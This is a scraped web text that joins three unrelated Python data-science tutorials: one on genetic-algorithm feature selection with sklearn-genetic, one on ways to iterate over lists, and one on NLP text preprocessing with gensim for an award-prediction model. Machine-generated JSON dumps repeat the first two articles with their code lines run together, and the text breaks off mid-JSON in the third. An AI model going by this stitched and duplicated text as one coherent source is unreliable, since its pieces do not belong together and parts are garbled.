As is often the case with many features, many are redundant. They add noise to your model and make model interpretation problematic.

The problem is determining which features are relevant to the task. The aim is to have quality features.

This post makes use of the 'sklearn-genetic' package:

github.com

This package is compatible with existing sklearn models and provides a great deal of functionality and options for genetic selection.

For this post, I am using a genetic algorithm for feature selection. But a genetic algorithm can also be used for hyper-parameter optimization. Because the steps are pretty straightforward and generalized, it applies to many different areas.

Selecting features is an NP-hard problem. Given a set of features, the optimal configuration is some subset of those features, so the selection is discrete. With so many possible subsets, it is very costly to determine the optimal feature set exhaustively.

Genetic algorithms use an approach inspired by evolution to determine an optimal set. For feature selection, the first step is to generate a population based on subsets of the possible features.

From this population, the subsets are evaluated using a predictive model for the target task. Once each member of the population is considered, a tournament is performed to determine which subsets will continue into the next generation. The next generation is composed of the tournament winners, with some crossover (update the winning feature sets with features from the other winners) and mutation (introduce or remove some features at random).

An initial population is produced.

A score is attached to the members of the population.

A subset is selected for reproduction with a tournament.

Select genetic material to pass on.

Apply mutations.

Repeat over multiple generations.

The algorithm runs for a set number of generations (iterations). After that, the best member of the population is taken as the selected feature set.

The experiments are based on the UCI breast cancer dataset, which contains 569 instances and 30 features. With this dataset, I test several classifiers with all of the features, the subset of features from the genetic algorithm, and five features selected with the chi-squared test for comparison.

Below is the code used to select up to five features using a genetic algorithm.
from sklearn.datasets import load_breast_cancer
from genetic_selection import GeneticSelectionCV
from sklearn.tree import DecisionTreeClassifier
import pandas as pd
import numpy as np

data = load_breast_cancer()
df = pd.DataFrame(data.data, columns=data.feature_names)
df['target'] = data.target

X = df.drop(['target'], axis=1)
y = df['target'].astype(float)

estimator = DecisionTreeClassifier()

model = GeneticSelectionCV(
    estimator, cv=5, verbose=0,
    scoring="accuracy", max_features=5,
    n_population=100, crossover_proba=0.5,
    mutation_proba=0.2, n_generations=50,
    crossover_independent_proba=0.5,
    mutation_independent_proba=0.04,
    tournament_size=3, n_gen_no_change=10,
    caching=True, n_jobs=-1)
model = model.fit(X, y)

print('Features:', X.columns[model.support_])

The initial population (of size 'n_population') is generated at random from the sample space of feature sets. These sets are limited in scope by the parameter 'max_features', which sets the maximum size of each feature subset.

For each member of the initial population, a score is measured with the target metric. This measurement is the performance of the specified estimator.

A tournament selection is performed to determine which members will continue to the next generation. The number of members within the tournament is set with 'tournament_size'. Tournament selection draws a few members from the population that compete against one another based on the scoring metric. The winner of a tournament is chosen as a parent for the next generation.

The number of members for the tournament should remain small. When the value is quite large, the current best member is usually selected. This behaviour causes none of the weaker members to be selected. While providing temporary performance gains, ultimately this leads to reduced performance overall, as the weaker options are not given a chance to improve.

In natural selection, genetic information is stored in a chromosome. During reproduction, some genetic material is passed from parent to child, so the child contains genetic material from both of the parents. This property is represented with the parameter 'crossover_proba'. The probability specified represents the chance of crossover from one generation to the next. There is also the parameter 'crossover_independent_proba', which is the probability that an individual feature will cross over to the child.

A critical aspect of evolution is mutation. Mutation mitigates the risk of the search falling into a local optimum and getting stuck. At each generation, in addition to the crossover, a random mutation is added. The probability that a mutation will happen is set with the parameter 'mutation_proba'. This parameter is combined with 'mutation_independent_proba', which is the chance of adding a feature to the feature set.

Notably, setting this probability too high transforms the algorithm into a random selection process. So, you will want to keep this value relatively low. Randomly introducing features in each generation effectively acts as a regularization for the genetic process.

The genetic search algorithm used here also has an 'n_gen_no_change' parameter, which monitors whether the best member of the population has changed over several generations. If it has not, the search has found an optimum; consider increasing the mutation or crossover probabilities to vary the selection further.

The results of the genetic vs the chi-squared feature selection are shown below. The baseline performance is also listed using all features.
The results are from cross-validation, the performance measured is accuracy, and the number of features used is in parentheses. While these results are by no means conclusive, they show the benefits of the genetic algorithm. Models built on the feature subset from the genetic algorithm consistently outperformed both the baseline model and the chi-squared feature subset. There was a single exception with the logistic regression model, where the results were still comparable.

Additionally, the optimal feature subsets produced were smaller than the maximum of five features. Models with fewer features are ultimately preferred to larger models, as they are simpler and more interpretable.

Genetic algorithms are incredibly versatile and apply to a wide range of scenarios.

This post explored how genetic algorithms are used for feature selection using the sklearn-genetic package. These algorithms have also been shown to be effective in hyper-parameter searches and generative design.

While less conventional than the readily available methods in sklearn, genetic algorithms offer a distinct and practical approach to feature selection. The way that these algorithms optimize is far different from most other feature selection methods. The process is based on a pure natural selection approach.

I encourage data scientists to take the time to understand and implement genetic algorithms in their work.

If you're interested in reading articles about novel data science tools and understanding machine learning algorithms, consider following me on Medium.

If you're interested in my writing and want to support me directly, please subscribe through the following link. This link ensures that I will receive a portion of your membership fees.
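For completeness, here is a minimal sketch of the chi-squared baseline mentioned above. It is my illustration using SelectKBest from scikit-learn, not code from the original post, and it assumes the same X and y as in the earlier snippet:

# Chi-squared baseline: keep the 5 highest-scoring features
from sklearn.feature_selection import SelectKBest, chi2

selector = SelectKBest(chi2, k=5).fit(X, y)
print('Chi-squared features:', X.columns[selector.get_support()])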
[ { "code": null, "e": 335, "s": 172, "text": "A genetic algorithm is a technique for optimization problems based on natural selection. In this post, I show how to use genetic algorithms for feature selection." }, { "code": null, "e": 471, "s": 335, "text": "While there are many well-known feature selections methods in scikit-learn, feature selection goes well beyond what is available there." }, { "code": null, "e": 657, "s": 471, "text": "Feature selection is a crucial aspect of any machine learning pipeline. However, these days there is a surplus of available data. As a consequence, there is often a surplus of features." }, { "code": null, "e": 790, "s": 657, "text": "As is often the case with many features, many are redundant. They add noise to your model and make model interpretation problematic." }, { "code": null, "e": 897, "s": 790, "text": "The problem is determining what features are relevant to the problem. The aim is to have quality features." }, { "code": null, "e": 951, "s": 897, "text": "This post makes use of the ‘sklearn-genetic’ package:" }, { "code": null, "e": 962, "s": 951, "text": "github.com" }, { "code": null, "e": 1096, "s": 962, "text": "This package is compatible with existing sklearn models and provides a great deal of functionality and options for genetic selection." }, { "code": null, "e": 1339, "s": 1096, "text": "For this post, I am using a genetic algorithm for feature selection. But, a genetic algorithm can also be used for hyper-parameter optimization. Because the steps are pretty straightforward and generalized, it applies to many different areas." }, { "code": null, "e": 1600, "s": 1339, "text": "Selecting features is an NP-Hard problem. The optimal configuration is a set or subset of those features, given a set of features. This method is a discrete selection. With a permutation of possibilities, it is very costly to determine the optimal feature set." }, { "code": null, "e": 1792, "s": 1600, "text": "Genetic algorithms use an approach to determine an optimal set based on evolution. For feature selection, the first step is to generate a population based on subsets of the possible features." }, { "code": null, "e": 2240, "s": 1792, "text": "From this population, the subsets are evaluated using a predictive model for the target task. Once each member of the population is considered, a tournament is performed to determine which subsets will continue into the next generation. The next generation is composed of the tournament winners, with some cross over (update the winning feature sets with features from the other winners) and mutation (introduce or remove some features at random)." }, { "code": null, "e": 2468, "s": 2240, "text": "An initial population is produced.A score is attached to the members of the population.A subset is selected for reproduction with a tournament.Select genetic material to pass on.Apply mutations.Repeat over multiple generations." }, { "code": null, "e": 2503, "s": 2468, "text": "An initial population is produced." }, { "code": null, "e": 2557, "s": 2503, "text": "A score is attached to the members of the population." }, { "code": null, "e": 2614, "s": 2557, "text": "A subset is selected for reproduction with a tournament." }, { "code": null, "e": 2650, "s": 2614, "text": "Select genetic material to pass on." }, { "code": null, "e": 2667, "s": 2650, "text": "Apply mutations." }, { "code": null, "e": 2701, "s": 2667, "text": "Repeat over multiple generations." 
}, { "code": null, "e": 2842, "s": 2701, "text": "The algorithm runs for a set number of generations (iterations). After which, the optimal member of the population is the selected features." }, { "code": null, "e": 3132, "s": 2842, "text": "The experiments are based on the UCI breast cancer dataset, which contains 569 instances and 30 features. With this dataset, I test several classifiers with all of the features, the subset of features from the genetic algorithm, and five features using the chi-squared test for comparison." }, { "code": null, "e": 3212, "s": 3132, "text": "Below is the code used to select up to five features using a genetic algorithm." }, { "code": null, "e": 3988, "s": 3212, "text": "from sklearn.datasets import load_breast_cancerfrom genetic_selection import GeneticSelectionCVfrom sklearn.tree import DecisionTreeClassifierimport pandas as pdimport numpy as npdata = load_breast_cancer()df = pd.DataFrame(data.data, columns=data.feature_names)df['target'] = data.targetX = df.drop(['target'], axis=1)y = df['target'].astype(float)estimator = DecisionTreeClassifier()model = GeneticSelectionCV( estimator, cv=5, verbose=0, scoring=\"accuracy\", max_features=5, n_population=100, crossover_proba=0.5, mutation_proba=0.2, n_generations=50, crossover_independent_proba=0.5, mutation_independent_proba=0.04, tournament_size=3, n_gen_no_change=10, caching=True, n_jobs=-1)model = model.fit(X, y)print('Features:', X.columns[model.support_])" }, { "code": null, "e": 4215, "s": 3988, "text": "The initial population (of size ‘n_population’) is generated at random from the sample space of feature sets. These sets are limited in scope by the parameter ‘max_features’, which sets the maximum size of each feature subset." }, { "code": null, "e": 4366, "s": 4215, "text": "For each member of the initial population, a score is measured with the target metric. This measurement is the performance of the estimator specified." }, { "code": null, "e": 4746, "s": 4366, "text": "A tournament selection is performed to determine which members will continue to the next generation. The number of members within the tournament is set with ‘tournament_size’. Tournament size is a selection of a few members from the population that compete against one another based on the scoring metric. The winner of a tournament is chosen as a parent for the next generation." }, { "code": null, "e": 5107, "s": 4746, "text": "The number of members for the tournament should remain small. When the value is quite large, the current best member is usually selected. This behaviour causes none of the weaker members to be selected. While providing temporary performance gains, ultimately, this leads to a reduced performance overall as the weaker options are not given a chance to improve." }, { "code": null, "e": 5614, "s": 5107, "text": "In natural selection, genetic information is stored in a chromosome. During reproduction, some genetic material is passed from parent to the children. Then the child contains genetic material from both of the parents. This property is represented with the parameter ‘crossover_proba’. The probability specified represents the chance of cross over from one generate to the next. There is also the parameter ‘crossover_independent_proba’, which is the probability that a feature will cross over to the child." }, { "code": null, "e": 6035, "s": 5614, "text": "A critical aspect of evolution is mutation. Mutation mitigates the risk of the search falling into a local optimum and getting stuck. 
At each generation, in addition to the crossover, a random mutation is added. The probability that a mutation will happen is set with the parameter ‘mutation_prob’. This parameter is combined with ‘mutation_independent_proba’, which is the chance of adding a feature to the feature set." }, { "code": null, "e": 6300, "s": 6035, "text": "Notably, setting this probability too high transforms the algorithm into a random selection process. So, you will want to keep this value relatively low. Randomly introducing features in each generation effectively acts as a regularization for the genetic process." }, { "code": null, "e": 6613, "s": 6300, "text": "The genetic search algorithm used here also has a ‘n_gen_no_change’ parameter which monitors if the best member of the population hasn’t changed over several generations. The search has found an optimum in this scenario. Consider increasing the mutation or cross over probabilities to vary the selection further." }, { "code": null, "e": 6883, "s": 6613, "text": "The results of the genetic vs the chi-squared feature selection are showed below. The baseline performance is also listed using all features. The results are from cross-validation, the performance measured is accuracy, and the number of features used is in parenthesis." }, { "code": null, "e": 7260, "s": 6883, "text": "While these results are by no means conclusive, they show the benefits of the genetic algorithm. The model performance is based on the subset of features from the genetic algorithm that consistently outperformed both the baseline model and the chi-square feature subset. There was a single exception with the logistic regression model, where the results were still comparable." }, { "code": null, "e": 7472, "s": 7260, "text": "Additionally, the optimal feature subsets produced were smaller than the maximum of five features. Models with fewer features are ultimately preferred to larger models as they are simpler and more interpretable." }, { "code": null, "e": 7556, "s": 7472, "text": "Genetic Algorithms are incredibly versatile and apply to a wide range of scenarios." }, { "code": null, "e": 7769, "s": 7556, "text": "This post explored how genetic algorithms are used for feature selection using the sklearn-genetic package. These algorithms have also been shown to be effective in hyper-parameter searches and generative design." }, { "code": null, "e": 8079, "s": 7769, "text": "While less conventional than the readily available methods in sklearn, genetic algorithms offer a distinct and practical approach to feature selection. The way that these algorithms optimize is far different from most other feature selection methods. The process is based on a pure natural selection approach." }, { "code": null, "e": 8186, "s": 8079, "text": "I encourage data scientists to take the time to understand and implement genetic algorithms in their work." }, { "code": null, "e": 8338, "s": 8186, "text": "If you’re interested in reading articles about novel data science tools and understanding machine learning algorithms, consider following me on Medium." } ]
Iterate over a list in Python - GeeksforGeeks
06 Nov, 2021

List is equivalent to arrays in other languages, with the extra benefit of being dynamic in size. In Python, the list is a type of container in Data Structures, which is used to store multiple data at the same time. Unlike Sets, lists in Python are ordered and have a definite count.

There are multiple ways to iterate over a list in Python. Let's see all the different ways to iterate over a list in Python.

Method #1: Using For loop

Python3

# Python3 code to iterate over a list
list = [1, 3, 5, 7, 9]

# Using for loop
for i in list:
    print(i)

Output:

1
3
5
7
9

Method #2: For loop and range()

In case we want to use the traditional for loop which iterates from number x to number y.

Python3

# Python3 code to iterate over a list
list = [1, 3, 5, 7, 9]

# getting length of list
length = len(list)

# Iterating the index
# same as 'for i in range(len(list))'
for i in range(length):
    print(list[i])

Output:

1
3
5
7
9

Iterating using the index is not recommended if we can iterate over the elements (as done in Method #1).

Method #3: Using while loop

Python3

# Python3 code to iterate over a list
list = [1, 3, 5, 7, 9]

# Getting length of list
length = len(list)
i = 0

# Iterating using while loop
while i < length:
    print(list[i])
    i += 1

Output:

1
3
5
7
9

Method #4: Using list comprehension (possibly the most concise way).

Python3

# Python3 code to iterate over a list
list = [1, 3, 5, 7, 9]

# Using list comprehension
[print(i) for i in list]

Output:

1
3
5
7
9

Method #5: Using enumerate()

If we want to convert the list into an iterable list of tuples (or get the index based on a condition check, for example in linear search you might need to save the index of the minimum element), you can use the enumerate() function.

Python3

# Python3 code to iterate over a list
list = [1, 3, 5, 7, 9]

# Using enumerate()
for i, val in enumerate(list):
    print(i, ",", val)

Output:

0 , 1
1 , 3
2 , 5
3 , 7
4 , 9

Note: Even method #2 can be used to find the index, but method #1 can't (unless an extra variable is incremented every iteration), and method #5 gives a concise representation of this indexing.

Method #6: Using numpy

For very large n-dimensional lists (for example an image array), it is sometimes better to use an external library such as numpy.

Python3

# Python program for
# iterating over array
import numpy as geek

# creating an array using
# the arange method
a = geek.arange(9)

# shape array with 3 rows
# and 3 columns
a = a.reshape(3, 3)

# iterating an array
for x in geek.nditer(a):
    print(x)

Output:

0
1
2
3
4
5
6
7
8

We can use np.ndenumerate() to mimic the behavior of enumerate(). The extra power of NumPy comes from the fact that we can even control the way to visit the elements (Fortran order rather than C order, say :)) but the one caveat is that np.nditer treats the array as read-only by default, so one must pass extra flags such as op_flags=['readwrite'] for it to be able to modify elements.
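To make the np.ndenumerate() remark above concrete, here is a small sketch (my addition, not from the original article); it pairs every element with its index tuple, much like enumerate() does for plain lists:

# Iterating with index positions using numpy's ndenumerate
import numpy as np

a = np.arange(9).reshape(3, 3)

# each iteration yields (index_tuple, value), e.g. ((0, 1), 1)
for idx, val in np.ndenumerate(a):
    print(idx, val)

Because the index is a tuple, this works for arrays of any dimensionality, unlike enumerate() on a flat list.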
[ { "code": null, "e": 23763, "s": 23735, "text": "\n06 Nov, 2021" }, { "code": null, "e": 24047, "s": 23763, "text": "List is equivalent to arrays in other languages, with the extra benefit of being dynamic in size. In Python, the list is a type of container in Data Structures, which is used to store multiple data at the same time. Unlike Sets, lists in Python are ordered and have a definite count." }, { "code": null, "e": 24213, "s": 24047, "text": "There are multiple ways to iterate over a list in Python. Let’s see all the different ways to iterate over a list in Python, and performance comparison between them." }, { "code": null, "e": 24240, "s": 24213, "text": "Method #1: Using For loop " }, { "code": null, "e": 24248, "s": 24240, "text": "Python3" }, { "code": "# Python3 code to iterate over a listlist = [1, 3, 5, 7, 9] # Using for loopfor i in list: print(i)", "e": 24352, "s": 24248, "text": null }, { "code": null, "e": 24361, "s": 24352, "text": "Output: " }, { "code": null, "e": 24371, "s": 24361, "text": "1\n3\n5\n7\n9" }, { "code": null, "e": 24494, "s": 24371, "text": "Method #2: For loop and range()In case we want to use the traditional for loop which iterates from number x to number y. " }, { "code": null, "e": 24502, "s": 24494, "text": "Python3" }, { "code": "# Python3 code to iterate over a listlist = [1, 3, 5, 7, 9] # getting length of listlength = len(list) # Iterating the index# same as 'for i in range(len(list))'for i in range(length): print(list[i])", "e": 24707, "s": 24502, "text": null }, { "code": null, "e": 24716, "s": 24707, "text": "Output: " }, { "code": null, "e": 24726, "s": 24716, "text": "1\n3\n5\n7\n9" }, { "code": null, "e": 24862, "s": 24726, "text": "Iterating using the index is not recommended if we can iterate over the elements (as done in Method #1). Method #3: Using while loop " }, { "code": null, "e": 24870, "s": 24862, "text": "Python3" }, { "code": "# Python3 code to iterate over a listlist = [1, 3, 5, 7, 9] # Getting length of listlength = len(list)i = 0 # Iterating using while loopwhile i < length: print(list[i]) i += 1", "e": 25054, "s": 24870, "text": null }, { "code": null, "e": 25063, "s": 25054, "text": "Output: " }, { "code": null, "e": 25073, "s": 25063, "text": "1\n3\n5\n7\n9" }, { "code": null, "e": 25145, "s": 25073, "text": "Method #4: Using list comprehension (Possibly the most concrete way). " }, { "code": null, "e": 25153, "s": 25145, "text": "Python3" }, { "code": "# Python3 code to iterate over a listlist = [1, 3, 5, 7, 9] # Using list comprehension[print(i) for i in list]", "e": 25265, "s": 25153, "text": null }, { "code": null, "e": 25274, "s": 25265, "text": "Output: " }, { "code": null, "e": 25284, "s": 25274, "text": "1\n3\n5\n7\n9" }, { "code": null, "e": 25543, "s": 25284, "text": "Method #5: Using enumerate()If we want to convert the list into an iterable list of tuples (or get the index based on a condition check, for example in linear search you might need to save the index of minimum element), you can use the enumerate() function. 
" }, { "code": null, "e": 25551, "s": 25543, "text": "Python3" }, { "code": "# Python3 code to iterate over a listlist = [1, 3, 5, 7, 9] # Using enumerate()for i, val in enumerate(list): print (i, \",\",val)", "e": 25684, "s": 25551, "text": null }, { "code": null, "e": 25693, "s": 25684, "text": "Output: " }, { "code": null, "e": 25723, "s": 25693, "text": "0 , 1\n1 , 3\n2 , 5\n3 , 7\n4 , 9" }, { "code": null, "e": 26071, "s": 25723, "text": "Note: Even method #2 can be used to find the index, but method #1 can’t (Unless an extra variable is incremented every iteration) and method #5 gives a concise representation of this indexing. Method #6: Using numpyFor very large n-dimensional lists (for example an image array), it is sometimes better to use an external library such as numpy. " }, { "code": null, "e": 26079, "s": 26071, "text": "Python3" }, { "code": "# Python program for# iterating over arrayimport numpy as geek # creating an array using # arrange methoda = geek.arange(9) # shape array with 3 rows # and 4 columnsa = a.reshape(3, 3) # iterating an arrayfor x in geek.nditer(a): print(x)", "e": 26324, "s": 26079, "text": null }, { "code": null, "e": 26333, "s": 26324, "text": "Output: " }, { "code": null, "e": 26351, "s": 26333, "text": "0\n1\n2\n3\n4\n5\n6\n7\n8" }, { "code": null, "e": 26743, "s": 26351, "text": "We can use np.ndenumerate() to mimic the behavior of enumerating. The extra power of NumPy comes from the fact that we can even control the way to visit the elements (Fortran order rather than C order, say :)) but the one caveat is that the np.nditer treats the array as read-only by default, so one must pass extra flags such as op_flags=[‘readwrite’] for it to be able to modify elements. " }, { "code": null, "e": 26756, "s": 26743, "text": "Akanksha_Rai" }, { "code": null, "e": 26767, "s": 26756, "text": "espinozahg" }, { "code": null, "e": 26784, "s": 26767, "text": "punamsingh628700" }, { "code": null, "e": 26791, "s": 26784, "text": "Picked" }, { "code": null, "e": 26812, "s": 26791, "text": "Python list-programs" }, { "code": null, "e": 26824, "s": 26812, "text": "python-list" }, { "code": null, "e": 26831, "s": 26824, "text": "Python" }, { "code": null, "e": 26843, "s": 26831, "text": "python-list" }, { "code": null, "e": 26941, "s": 26843, "text": "Writing code in comment?\nPlease use ide.geeksforgeeks.org,\ngenerate link and share the link here." }, { "code": null, "e": 26950, "s": 26941, "text": "Comments" }, { "code": null, "e": 26963, "s": 26950, "text": "Old Comments" }, { "code": null, "e": 26995, "s": 26963, "text": "How to Install PIP on Windows ?" }, { "code": null, "e": 27032, "s": 26995, "text": "Create a Pandas DataFrame from Lists" }, { "code": null, "e": 27088, "s": 27032, "text": "How to drop one or multiple columns in Pandas Dataframe" }, { "code": null, "e": 27117, "s": 27088, "text": "*args and **kwargs in Python" }, { "code": null, "e": 27150, "s": 27117, "text": "Graph Plotting in Python | Set 1" }, { "code": null, "e": 27192, "s": 27150, "text": "How To Convert Python Dictionary To JSON?" }, { "code": null, "e": 27234, "s": 27192, "text": "Check if element exists in list in Python" }, { "code": null, "e": 27270, "s": 27234, "text": "Convert integer to string in Python" }, { "code": null, "e": 27306, "s": 27270, "text": "Python | Pandas dataframe.groupby()" } ]
NLP-based Data Preprocessing Method to Improve Prediction Model Accuracy | by Sergey Burukin | Towards Data Science
Nowadays, using machine learning in a peer-to-peer marketplace is very popular, as it can improve the UX and increase customer loyalty. In part 1, I described the main stages of the ML-based award recommendation system for the crowdsourcing platform Arcbazar.com, where a customer initiates a designers' competition and sets a money prize. The ML system was trained on the dataset of completed competitions with paid awards to help a customer set the optimal award for a certain architectural project. The optimal regression algorithm was chosen after the data analysis.

As mentioned in the previous article, I made some simplifications of the dataset. I replaced three text description fields of the training dataset with one numeric value: the total number of characters. So I got a 5-field dataset instead of 7 fields.

However, the tests showed that the model accuracy could be increased.

In this post, I'm going to tell you how to upgrade the prediction model using Natural Language Processing for the dataset preprocessing.

The classical Greek philosopher Socrates said, "Speak, so that I can see you". This aphorism means that our speech tells more about our personality than we want to say. It also suggests a hypothesis: the project's text description may be linked to the award amount, and that relationship may be much stronger than a simple character count.

I decided to transform the string-type data of the text descriptions to numeric values using Natural Language Processing methods, with the additional aim of enriching and homogenizing the dataset.

The ML system upgrade was divided into three main steps:

Text Cleaning.

Text-to-Number Transformation.

Choosing the Optimal Regression Method.

For each text description field of the database, I applied text cleaning algorithms using the Natural Language Toolkit and gensim libraries for Python. However, you can use any NLP library you prefer. I transformed the text to lower case and removed punctuation and English-language stopwords.

#Transform to lower case
import string
features['description'] = features['description'].str.lower()

#Remove punctuation
table = str.maketrans('', '', string.punctuation)
features['description'] = [features['description'][row].translate(table) for row in range(len(features['description']))]

#Remove stopwords
import nltk
nltk.download('stopwords')
from nltk.corpus import stopwords
stop = stopwords.words('english')
features['description'] = features['description'].apply(lambda x: " ".join(x for x in x.split() if x not in stop))

Then the most and the least frequent words in each field were removed. The meanings of the common (most frequent) words in the semantic analysis are very close to stopwords. They add a noise-like pattern to the texts. Furthermore, the least frequent words have a negligible meaning, and they can be filtered out. The aim of this step was to keep the more distinctive words as the most valuable ones. I used a graphical analysis, plotting words vs their frequency.
#Find words spreading (each word frequency)
freq_d = pd.Series(' '.join(features['description']).split()).value_counts()

#Plot the words distribution
freq_d.plot(kind='line', ax=None, figsize=None, use_index=True, title=None, grid=None,
            legend=False, style=None, logx=False, logy=False, loglog=False, xticks=None,
            yticks=None, xlim=None, ylim=None, rot=None, fontsize=None, colormap=None,
            table=False, yerr=None, xerr=None, label=None, secondary_y=False)

The word frequency visualization helped me filter the words with approximate frequencies between 5 and 200.

#Remove the least frequent words
rare_d = pd.Series(' '.join(features['description']).split()).value_counts()[-17528:]
rare_d = list(rare_d.index)
features['description'] = features['description'].apply(lambda x: " ".join(x for x in x.split() if x not in rare_d))

#Remove the most frequent words
freq_d = pd.Series(' '.join(features['description']).split()).value_counts()[:30]
freq_d = list(freq_d.index)
features['description'] = features['description'].apply(lambda x: " ".join(x for x in x.split() if x not in freq_d))

Then each text record was tokenized, i.e. split into an array of words.

features['description'] = [text.split() for text in features['description']]

The combination of words and their frequency gave a vector of text, where each word is replaced with its index. Similar vectors indicate similar texts. That is how semantic searching engines work. Unlike modern search engines, here I only concentrate on a single aspect of possible similarities: the apparent semantic relatedness of their texts (words). No hyperlinks, no random-walk static ranks, just a semantic extension over the boolean keyword match.

#Create a set of text records for each field
from gensim import corpora
dict_d = corpora.Dictionary(features['description'])

Converting a text into the bag-of-words (BoW) format, that is, a list of (token_id, token_count) tuples, was done with the .doc2bow() method of the gensim.corpora.Dictionary class.

#Convert tokenized text (corpora) to vectors
corpus_d = [dict_d.doc2bow(line) for line in features['description']]

To get a real number instead of a vector, I used a norm, that is, a function that assigns a strictly positive length or size to each vector in a vector space.

#Transform vectors of texts to scalar values (calculating norms of vectors)
from numpy import linalg as LA
corpus_d_vec_norm = [LA.norm(vec) for vec in corpus_d]

#Replace text descriptions in the database with norms of vectors
features['description'] = corpus_d_vec_norm

Finally, I got a homogeneous 7-field dataset.

I used the best-rated machine learning method from the previous tests, Random Forest Regressor, to calculate how the model fits our new dataset. The coefficient of determination, R-squared, was about twice as good (~0.75) as with the 5-field dataset (0.37).

Initially, I had a mixed dataset: the first three fields (drop-down menus) are obviously interdependent, and the next three (descriptions) are more fluctuant.

According to my hypothesis, the description fields are more philosophically (or even psychologically) close to the award value. So I changed the ML method to an artificial neural network. By the way, this algorithm was rejected in the previous test with the 5-field dataset due to its very low R-squared of 0.05.

However, a Multi-layer Perceptron Regressor with a single hidden layer of just three neurons gave a fantastic result with an R-squared of 0.999962.
import sklearn
from sklearn.neural_network import MLPRegressor

mlpreg = MLPRegressor(hidden_layer_sizes=(3,), activation='relu',
                      solver='adam', alpha=0.001, batch_size='auto',
                      learning_rate='adaptive', learning_rate_init=0.01,
                      power_t=0.5, max_iter=1000, shuffle=True,
                      random_state=9, tol=0.0001, verbose=False,
                      warm_start=False, momentum=0.9, nesterovs_momentum=True,
                      early_stopping=False, validation_fraction=0.1,
                      beta_1=0.9, beta_2=0.999, epsilon=1e-08)

1. The obtained results show the suitability of the vector norm for replacing a vector of text without significant data loss.

2. A customer's verbal description of their needs is much more closely linked to the money award amount than the drop-down menus, because that text may express human essence or a common motive.

3. The ANN-based algorithm is better at 'understanding' human nature than Random Forest, first of all because of its structural similarity to a human brain.
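To make the text-to-number step easier to reproduce, here is a minimal, self-contained sketch of the same doc2bow-plus-norm transformation on toy data (my illustration; the sample texts and variable names are invented, not taken from the original project):

# Tokenized texts -> gensim bag-of-words vectors -> one scalar norm per text
from gensim import corpora
from numpy import linalg as LA

docs = [['modern', 'kitchen', 'remodel'],
        ['small', 'garden', 'studio', 'studio']]

dictionary = corpora.Dictionary(docs)                     # maps each word to an integer id
bow_vectors = [dictionary.doc2bow(doc) for doc in docs]   # lists of (token_id, count) tuples
norms = [LA.norm(vec) for vec in bow_vectors]             # one scalar per document

print(bow_vectors)
print(norms)

As in the article's code, the norm is taken over the raw (token_id, count) pairs, so the resulting scalar depends on the dictionary's token ids as well as on the word counts.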
[ { "code": null, "e": 744, "s": 171, "text": "Nowadays, using machine learning for peer-to-peer marketplace is very popular as it can improve the UX and increase customer loyalty. In the part 1, I described the main stages of the ML-based award recommendation system for crowdsourcing platform Arcbazar.com, where a customer initiates a designers’ competition and sets a money prize. The ML system was trained on the dataset of the completed competitions with paid awards to help a customer set the optimal award for a certain architectural project. The optimal regression algorithm was chosen after the data analysis." }, { "code": null, "e": 1012, "s": 744, "text": "As it was mentioned in the previous article, I made some simplifications of the dataset. I replaced three text description fields of the training dataset with one that had a numeric value — a total quantity of chars. So, I got the 5-field dataset instead of 7 fields." }, { "code": null, "e": 1082, "s": 1012, "text": "However, the tests showed that the model accuracy could be increased." }, { "code": null, "e": 1219, "s": 1082, "text": "In this post, I’m going to tell you how to upgrade the prediction model using Natural Language Processing for the dataset preprocessing." }, { "code": null, "e": 1558, "s": 1219, "text": "A classical Greek philosopher Socrates said, “Speak, so that I can see you”. This aphorism means that our speech tells more about our personality than we want to say. Also, it gives a cue for a hypothesis that the project’s text description may be linked with award amount and these relationships are much stronger than a number of chars." }, { "code": null, "e": 1740, "s": 1558, "text": "I decided to transform string-type data of the text descriptions to numeric values using Natural Language Processing methods with an additional aim to enrich and homogenize dataset." }, { "code": null, "e": 1797, "s": 1740, "text": "The ML system upgrade was divided into three main steps:" }, { "code": null, "e": 1881, "s": 1797, "text": "Text Cleaning.Text-to-Number Transformation.Choosing the Optimal Regression Method." }, { "code": null, "e": 1896, "s": 1881, "text": "Text Cleaning." }, { "code": null, "e": 1927, "s": 1896, "text": "Text-to-Number Transformation." }, { "code": null, "e": 1967, "s": 1927, "text": "Choosing the Optimal Regression Method." }, { "code": null, "e": 2259, "s": 1967, "text": "For each text description field of the database, I applied text cleaning algorithms using Natural Language Toolkit and gensim libraries for Python language. However, you can use any NLP library you prefer. I transformed text to lower case, removed punctuation and English-language stopwords." }, { "code": null, "e": 2780, "s": 2259, "text": "#Transform to lower caseimport stringfeatures['description'] = features['description'].str.lower()#Remove punctuationtable = str.maketrans('', '', string.punctuation)features['description'] = [features['description'][row].translate(table) for row in range(len(features['description']))]#Remove stopwordsimport nltknltk.download('stopwords')from nltk.corpus import stopwordsstop = stopwords.words('english')features['description'] = features['description'].apply(lambda x: \" \".join(x for x in x.split() if x not in stop))" }, { "code": null, "e": 3225, "s": 2780, "text": "Then the most and the least frequent words in each field were removed. The meanings of the common (most frequent) words in the semantic analysis are very close to stopwords. They add a noise-like pattern to the texts. 
Furthermore, the least frequent words have a negligible meaning, and they can be filtered out. The aim of this step was to filter unique words as the most valuable. I used a graphic analysis, plotting words vs their frequency." }, { "code": null, "e": 3732, "s": 3225, "text": "#Find words spreading (each word frequency)freq_d = pd.Series(‘ ‘.join(features[‘description’]).split()).value_counts()#Plot the words distributionfreq_d.plot(kind=’line’, ax=None, figsize=None, use_index=True, title=None, grid=None, legend=False, style=None, logx=False, logy=False, loglog=False, xticks=None, yticks=None, xlim=None, ylim=None, rot=None, fontsize=None, colormap=None, table=False, yerr=None, xerr=None, label=None, secondary_y=False)" }, { "code": null, "e": 3840, "s": 3732, "text": "The word frequency visualization helped me filter the words with approximate frequencies between 5 and 200." }, { "code": null, "e": 4356, "s": 3840, "text": "#Remove the least frequent wordsrare_d = pd.Series(' '.join(features['description']).split()).value_counts()[-17528:]rare_d = list(rare_d.index)features['description'] = features['description'].apply(lambda x: \" \".join(x for x in x.split() if x not in rare_d))#Remove the most frequent wordsfreq_d = pd.Series(' '.join(features['description']).split()).value_counts()[:30]freq_d = list(freq_d.index)features['description'] = features['description'].apply(lambda x: \" \".join(x for x in x.split() if x not in freq_d))" }, { "code": null, "e": 4435, "s": 4356, "text": "Then each text record was tokenized — a text was split into an array of words." }, { "code": null, "e": 4512, "s": 4435, "text": "features['description'] = [text.split() for text in features['description']]" }, { "code": null, "e": 4968, "s": 4512, "text": "The combination of words and their frequency gave a vector of text, where each word is replaced with its index. Similar vectors indicate similar texts. That is how semantic searching engines work. Unlike modern search engines, here I only concentrate on a single 